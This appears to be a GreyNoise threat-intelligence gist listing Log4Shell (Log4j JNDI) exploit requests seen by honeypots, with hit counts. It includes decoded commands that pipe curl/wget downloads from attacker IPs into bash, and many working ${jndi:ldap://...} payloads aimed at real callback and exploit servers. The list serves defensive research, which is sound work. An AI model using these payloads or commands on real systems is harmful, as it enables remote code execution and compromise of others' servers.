Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2

Included are three files:

  • payloads_no_base64.csv
    • all payloads that did not contain base64
  • payloads_base64.csv
    • all payloads with base64, <BASE64_SCRUBBED>
  • base64_decoded.csv
    • all decoded base64 payloads

All of these files have been somewhat scrubbed to remove GreyNoise sensor IPs, these have been replaced with <IP_ADDRESS>

_col0 hits
GET / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Encoding: gzip Connection: close User-Agent: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/<BASE64_SCRUBBED>} 1368
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/<BASE64_SCRUBBED>} Accept-Encoding: gzip Connection: close 605
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Encoding: gzip Connection: close Content-Length: 0 User-Agent: ${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/<BASE64_SCRUBBED>} 142
GET /haslocationredirect HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Encoding: gzip Connection: close Referer: http://<IP_ADDRESS>/ User-Agent: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/<BASE64_SCRUBBED>} 83
GET /haslocationredirect HTTP/1.1 Host: <IP_ADDRESS> Accept-Encoding: gzip Referer: http://<IP_ADDRESS>/ User-Agent: ${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/<BASE64_SCRUBBED>} 20
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Encoding: gzip Connection: close Content-Length: 0 User-Agent: ${jndi:ldap://80.71.158.44:1534/Basic/Command/Base64/<BASE64_SCRUBBED>} 2
_col0 hits
GET /favicon.ico HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:ldap://134.209.163.248:80/callback/ldap2} 10
GET /favicon.ico HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:rmi://134.209.163.248:80/Z} 10
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:ldap://a8fvkc.dnslog.cn/a} 10
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:ldap://134.209.163.248:389/callback/responder} 10
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:rmi://134.209.163.248:80/Z} 10
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:ldap://134.209.163.248:80/callback/ldap2} 10
GET /favicon.ico HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:ldap://a8fvkc.dnslog.cn/a} 9
GET /favicon.ico HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:ldap://134.209.163.248:389/callback/responder} 9
POST /login HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 159 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 username=${jndi:ldap://181.214.39.2:1389/Basic/Dnslog/dd7cc454.dns.1433.eu.org}&password=${jndi:ldap://181.214.39.2:1389/Basic/Dnslog/dd7cc454.dns.1433.eu.org} 5
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:ldap://134.209.163.248/callback/} 4
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:http://134.209.163.248/callback/https-port-443-and-http-callback-scheme} 4
GET /favicon.ico HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:ldap://134.209.163.248/callback/} 4
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8080d826c0b5.bingsearchlib.com:39356/a} 3
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a8fvkc.dnslog.cn/a} Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive 3
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://134.209.163.248:389/callback/responder} Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive 3
GET /haslocationredirect HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: id=aaa358a9-6f62-4025-b728-ca6b73bd8c8e User-Agent: ${jndi:ldap://a8fvkc.dnslog.cn/a} 3
GET /haslocationredirect HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: id=aaa358a9-6f62-4025-b728-ca6b73bd8c8e User-Agent: ${jndi:ldap://134.209.163.248:389/callback/responder} 3
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:rmi://134.209.163.248:80/Z} Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive 3
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://134.209.163.248:80/callback/ldap2} Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive 3
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://d9e62191c871.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://a2e9fb2e3c4c.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://814cbd9db83a.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 2
GET / HTTP/1.1 Host: <IP_ADDRESS>.mycitrixdemo.net Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close Cookie: ${jndi:ldap://<IP_ADDRESS>.mycitrixdemo.net.uomattd9ysrk6k5gq3hkzqk9c0ir6g.burpcollaborator.net/a} Referer: ${jndi:ldap://<IP_ADDRESS>.mycitrixdemo.net.uomattd9ysrk6k5gq3hkzqk9c0ir6g.burpcollaborator.net/a} User-Agent: ${jndi:ldap://<IP_ADDRESS>.mycitrixdemo.net.uomattd9ysrk6k5gq3hkzqk9c0ir6g.burpcollaborator.net/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e9b0342d054b.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 2
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://2674bae11493.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://bc73ab56138e.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://da84236b9b85.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://7ddeb490146f.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 2
GET / HTTP/1.1 user-agent: ${jndi:ldap://6c73ac5805a6.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://cc5771ce6578.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://e2d8b3228caa.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://c84d90bce5b0.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://fee3c5eb7fab.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://7ce81d8d105c.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://377f2cd13353.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://ea89fd7b0fe8.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://2c66efb5fd84.bingsearchlib.com:39356/a} 2
POST /login HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 97 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 username=${jndi:ldap://3136de6d.dns.1433.eu.org}&password=${jndi:ldap://3136de6d.dns.1433.eu.org} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://6247f54cc093.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://2c66efb5fd84.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://818231ed351f.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://134.209.163.248/callback/} Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://0cd8f9b3316f.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://61af907c9c16.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://b91ae2bcd6b0.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://5edab55c1054.bingsearchlib.com:39356/a} 2
POST /login HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 97 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 username=${jndi:ldap://dd7cc454.dns.1433.eu.org}&password=${jndi:ldap://dd7cc454.dns.1433.eu.org} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: ${jndi:ldap://test1.i2qxz3.dnslog.cn/123} 2
POST / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 72 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 a=${jndi:ldap://181.214.39.2:1389/Basic/Dnslog/dd7cc454.dns.1433.eu.org} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e96c2031474b.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 2
GET / HTTP/1.1 user-agent: ${jndi:ldap://e2216d7a9a31.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://dedb05132e0d.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:http://134.209.163.248/callback/https-port-443-and-http-callback-scheme} Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://137683b2aa41.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://ab3419ba1f45.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://fe8146cdcf9d.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://56f85f126bde.bingsearchlib.com:39356/a} 2
GET /favicon.ico HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: ${jndi:http://134.209.163.248/callback/https-port-443-and-http-callback-scheme} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://df0cfd6d42bb.bingsearchlib.com:39356/a} 2
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://64a0e6a432fb.bingsearchlib.com:39356/a} 2
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:35.0) Gecko/20100101 Firefox/35.0 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://01fde8c5eef6.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://3bef8e467305.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1337//Basic/Command/nslookup+nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.basic.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1337/Basic/Command/nslookup nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.basic.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1337/Basic/Command/nslookup nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.basic.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://1cd8008627fa.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close User-Agent: ${jndi:ldap://<IP_ADDRESS>.c6pnncggjk7jk873c9e0cg3zzcoyyyyyn.interactsh.com/999} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://b7ff69c2e4a3.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://6622a5adc159.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://1ab1b9cbdbd6.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET /$%7Bjndi:ldap://<IP_ADDRESS>.mycitrixdemo.net.c6propvhf06jk8dg5sfgcg353nyyyyygw.interactsh.com%7D HTTP/1.1 Host: <IP_ADDRESS>.mycitrixdemo.net Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close Cookie: ${jndi:ldap://<IP_ADDRESS>.mycitrixdemo.net.c6prmc7hf06jk2ieknagcg35scyyyyyyn.interactsh.com/ref} Referer: ${jndi:ldap://<IP_ADDRESS>.mycitrixdemo.net.c6prmc7hf06jk2ieknagcg35scyyyyyyn.interactsh.com/ref} User-Agent: ${jndi:ldap://<IP_ADDRESS>.mycitrixdemo.net.c6prmc7hf06jk2ieknagcg35scyyyyyyn.interactsh.com/ua} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://380103eb7aeb.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://a087aca06e38.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://a7aa8415ab06.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://bd417b6b753c.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://1aeb1cfef766.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://8b51f03a2236.bingsearchlib.com:39356/a} 1
GET /$%7Bjndi:ldap://li466-34.members.linode.com.%7D HTTP/1.1 Host: li466-34.members.linode.com Connection: close Accept: */* Accept-Encoding: gzip Accept-Language: en Connection: close Referer: ${jndi:ldap://li466-34.members.linode.com./ref} User-Agent: ${jndi:ldap://li466-34.members.linode.com./ua} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://05a1253070c9.bingsearchlib.com:39356/a} 1
GET /?q=${jndi:ldap://pwn.af:1337/GroovyBypass/Command/nslookup%20nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.groovy.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1337/GroovyBypass/Command/nslookup nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.groovy.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1337/GroovyBypass/Command/nslookup nucleix.226CYiYfSxnsDAJGggV2pJuvSRd.groovy.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://58d9c729c8f8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://faea7437a673.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://d72fe3e1e907.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://5463610592ef.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a4079b92cf3d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://470ffdd3c533.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://612877d3a59b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://0f7b09b34039.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://6143bdb7e926.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://37fccd21badb.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://15df2d977578.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e48e744f3efb.bingsearchlib.com:39356/a} 1
GET /$%7Bjndi:ldaps://a24e817c.probe001.log4j.leakix.net:12042/b%7D?${jndi:ldaps://a24e817c.probe001.log4j.leakix.net:12042/b}=${jndi:ldaps://a24e817c.probe001.log4j.leakix.net:12042/b} HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldaps://a24e817c.probe001.log4j.leakix.net:12042/b} Cache-Control: ${jndi:ldaps://a24e817c.probe001.log4j.leakix.net:12042/b} Cookie: ${jndi:ldaps://a24e817c.probe001.log4j.leakix.net:12042/b}=${jndi:ldaps://a24e817c.probe001.log4j.leakix.net:12042/b} X-Leakix: ${jndi:ldaps://a24e817c.probe001.log4j.leakix.net:12042/b} Accept-Encoding: gzip Connection: close 1
GET /favicon.ico HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: id=aaa358a9-6f62-4025-b728-ca6b73bd8c8e User-Agent: ${jndi:ldap://a8fvkc.dnslog.cn/a} 1
GET /?q=${jndi:ldap://pwn.af:1337/TomcatBypass/Dnslog/nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.tomcat.li826-29.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li826-29.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1337/TomcatBypass/Dnslog/nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.tomcat.li826-29.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1337/TomcatBypass/Dnslog/nucleix.226CYoqzG5So3jeGDUvZzh9KDvA.tomcat.li826-29.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8caa3e3ea145.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://46fda53f5c6e.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://f6a237f9f9c0.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://05c684d21698.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://1181a9ec5624.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://c5921cee5a6b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://9acbd5edcd5d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8674fcff449f.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8280bbd9fc75.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://d9deb806b682.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://a615cbc5751b.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://0d8589188b4c.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://753741cf5e16.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://258b23992ec8.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://813264da9150.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://550f7e1deaed.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://f798f74fd21a.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://749e532b8f77.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://526cde5a9a9a.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET /?q=${jndi:ldap://pwn.af:1389/TomcatBypass/Dnslog/nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.tomcat.li466-34.members.linode.com.dns.rce.ee} HTTP/1.1 Host: li466-34.members.linode.com Connection: close Accept-Encoding: gzip Connection: close Referer: ${jndi:ldap://pwn.af:1389/TomcatBypass/Dnslog/nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.tomcat.li466-34.members.linode.com.dns.rce.ee} User-Agent: ${jndi:ldap://pwn.af:1389/TomcatBypass/Dnslog/nucleix.226Fa7zGXD9lLYrn3aTodkEPfyc.tomcat.li466-34.members.linode.com.dns.rce.ee} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://8ea121865922.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://224bb1fc26e9.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://8282e3b45423.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://80b53c62a6f4.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://46c5056a2388.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://60ec26e4b948.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://a6787b91ea1d.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://416b21120a59.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://e50073c99a13.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://2174d47e8d04.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://1e50d3412af4.bingsearchlib.com:39356/a} Accept: */* Accept-Encoding: gzip 1
GET / HTTP/1.1 user-agent: ${jndi:ldap://d8e9f17cf7bc.bingsearchlib.com:39356/a} Host: <IP_ADDRESS> 1
GET / HTTP/1.1 Host: <IP_ADDRESS> Accept: */* Accept-Encoding: gzip User-Agent: ${jndi:ldap://40d43ba64cc4.bingsearchlib.com:39356/a} 1
GET / HTTP/1.1 Host: <IP_ADDRESS> User-Agent: ${jndi:ldap://90f0268c6d14.bingsearchlib.com:39356/a} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Nexus 6P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
POST / HTTP/1.1 Host: <IP_ADDRESS> Connection: close Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close Content-Length: 69 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.220 Whale/1.3.51.7 Safari/537.36 ${jndi:ldap://w52xy10tpchsnvw7cu8hh6vbe2ku8j.burpcollaborator.net:80} 1
